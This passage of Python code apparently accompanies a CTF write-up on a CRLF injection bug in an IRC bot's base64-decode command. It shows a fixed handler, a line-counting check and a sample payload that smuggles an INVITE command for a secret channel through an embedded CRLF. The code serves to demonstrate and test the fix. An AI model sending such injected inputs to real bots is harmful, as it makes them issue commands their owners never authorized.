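    """A !base64d handler with the fix applied; bad input is reported, not echoed."""
    try:
        decoded = base64.b64decode(arg, validate=True).decode("utf-8", "replace")
    except binascii.Error:
        return privmsg_safe(target, "that is not valid base64")
    return privmsg_safe(target, decoded)


def count_irc_lines(wire: bytes) -> int:
    """How many separate IRC messages the server will parse out of `wire`."""
    return wire.count(b"\r\n")


# Constructed payload: the write-up's injected text with an actual CRLF.
PAYLOAD = "aaa\r\nINVITE h1tch #hacklu-secret-channel"
SAMPLE_B64 = base64.b64encode(PAYLOAD.encode("utf-8")).decode("ascii")
```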